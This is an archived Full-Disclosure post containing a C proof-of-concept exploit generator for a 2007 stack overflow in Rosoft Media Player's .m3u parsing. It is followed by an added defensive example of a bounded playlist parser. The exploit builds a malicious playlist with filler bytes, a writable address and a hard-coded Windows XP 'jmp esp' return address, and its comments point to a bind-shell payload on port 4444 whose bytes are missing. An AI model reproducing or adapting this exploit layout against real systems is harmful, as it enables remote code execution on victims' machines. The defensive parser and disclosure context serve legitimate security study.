
[Full-disclosure] Rosoft Media Player <= 4.1.7 .M3U Stack Overflow

/* rosoft-player-expl.c: 2007-12-18:
 * Copyright (c) 2007 devcode
 *          ^^ D E V C O D E ^^
 * Rosoft Media Player <= 4.1.7 .M3U Stack Overflow
 * [0-DAY]
 * Description:
 *    A stack overflow occurs when parsing an .m3u file
 *    which does not contain any delimiters.
 * Hotfix/Patch:
 *    None.
 * Vulnerable systems:
 *    Rosoft Media Player <= 4.1.7
 * Tested on:
 *    Rosoft Media Player 4.1.7
 *    This is a PoC and was created for educational purposes only. The
 *    author is not held responsible if this PoC does not work or is 
 *    used for any other purposes than the one stated above.
 * Notes:
 *    Nothing much here, except the player itself is a piece of shit.
 *    The vulnerability was found by Juan Pablo Lopez Yacubian
 *    (jplopezy_at_gmail.com). Come to think of it, the entire suite
 *    of products offered by Rosoft Engineering sucks bawls.
 */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

/*
 * Invalid chars: 0x1A 0xA 0xD 0x00
 * win32_bind - 
 * EXITFUNC=thread LPORT=4444 Size=344 Encoder=PexFnstenvSub 
 * http://metasploit.com 
 */
unsigned char uszShellcode[] =
    /* (payload bytes are not present in the archived post) */

int main( int argc, char **argv ) {
    FILE *f = NULL;
    char *p = NULL;

    printf( "\n\tRosoft Media Player <= 4.1.7 .M3U Stack Overflow\n\n" );
    printf( "\t\tCopyright (c) 2007 devcode\n\n\n" );

    if ( argc < 2 ) {
        printf( "Usage: %s <file>\n", argv[0] );
        return -1;
    }
    f = fopen( argv[1], "w+" );
    if ( !f ) {
        printf( "[-] Unable to create m3u file.\n" );
        return -1;
    }

    /* 5000 bytes of filler; the file contains no .m3u line delimiters */
    p = (char *)malloc( 5000 );
    if ( !p ) {
        printf( "[-] Out of memory.\n" );
        fclose( f );
        return -1;
    }
    memset( p, 0x41, 5000 );

    /*
     * We need a valid address here that contains 
     * a value of 0 and is writable, and of course, 
     * no 0x00s in the address itself. Try 0x1270FE0  
     * if 0x7FFDFFF0 doesn't work. 
     */
    memcpy( p+4096, "\xF0\xFF\xFD\x7F", 4 );

    /* Windows XP SP2 Pro - jmp esp (0x7C941EED, ntdll.dll) */
    memcpy( p+4104, "\xED\x1E\x94\x7C", 4 );
    memcpy( p+4108, uszShellcode, sizeof( uszShellcode ) );

    /* Cleanup */
    fputs( p, f );
    fclose( f );
    free( p );

    printf( "[*] File generated successfully!\n" );
    return 0;
}
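
From the defender's side, an added example that is not part of devcode's post and not Rosoft's code: a bounded .m3u line splitter that treats a delimiter-less file as one overlong line and refuses to copy it, which is exactly the check whose absence the PoC above depends on. The entry cap (260 bytes, the Windows MAX_PATH convention) and the 64-entry table size are assumed values, and the two sample inputs are constructed for the demo.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Caps are assumptions for this example, not values from Rosoft's player:
 * one entry is capped at 259 bytes + NUL (the Windows MAX_PATH convention),
 * and a playlist at 64 entries. */
#define M3U_MAX_ENTRY   260
#define M3U_MAX_ENTRIES 64

typedef struct {
    char   entries[M3U_MAX_ENTRIES][M3U_MAX_ENTRY];
    size_t count;    /* entries stored */
    size_t dropped;  /* lines rejected: too long, or table full */
} m3u_playlist;

/* Parse a .m3u buffer into fixed-size entries.
 * Lines are split on '\n' (a preceding '\r' is stripped); a buffer with no
 * delimiter at all is a single line. '#' lines (EXTM3U directives and
 * comments) are skipped. A line that would not fit is counted and discarded:
 * every copy is bounded by the destination, never by the input length. */
size_t m3u_parse(const char *data, size_t len, m3u_playlist *out)
{
    size_t start = 0, i;
    memset(out, 0, sizeof *out);
    for (i = 0; i <= len; i++) {
        size_t end, n;
        if (i < len && data[i] != '\n')
            continue;                  /* still inside the current line */
        end = i;
        if (end > start && data[end - 1] == '\r')
            end--;
        n = end - start;
        if (n > 0 && data[start] != '#') {
            if (n >= M3U_MAX_ENTRY || out->count >= M3U_MAX_ENTRIES) {
                out->dropped++;        /* reject, do not truncate-and-copy */
            } else {
                memcpy(out->entries[out->count], data + start, n);
                out->entries[out->count][n] = '\0';
                out->count++;
            }
        }
        start = i + 1;
    }
    return out->count;
}

/* Shared result of the two constructed demo runs below. */
static m3u_playlist g_pl;

/* Constructed, well-formed playlist: returns the number of entries kept. */
size_t demo_well_formed(void)
{
    static const char sample[] = "#EXTM3U\r\nsong1.mp3\r\nsong2.mp3\n";
    return m3u_parse(sample, sizeof sample - 1, &g_pl);
}

/* The shape of input the PoC above writes: 5000 bytes with no line
 * delimiter at all. Returns the number of lines dropped (1), with nothing
 * copied into the entry table. */
size_t demo_delimiterless(void)
{
    static char hostile[5000];
    memset(hostile, 'A', sizeof hostile);
    m3u_parse(hostile, sizeof hostile, &g_pl);
    return g_pl.dropped;
}

int main(void)
{
    size_t i, dropped;
    demo_well_formed();
    for (i = 0; i < g_pl.count; i++)
        printf("entry %zu: %s\n", i, g_pl.entries[i]);
    dropped = demo_delimiterless();
    printf("delimiter-less 5000-byte input: %zu line(s) dropped, %zu stored\n",
           dropped, g_pl.count);
    return 0;
}
```

The design choice worth noting is that an overlong line is rejected rather than truncated: truncating silently turns a hostile file into a playlist that half-works, while rejecting it keeps the parser's behaviour independent of how long the attacker makes the line.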

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/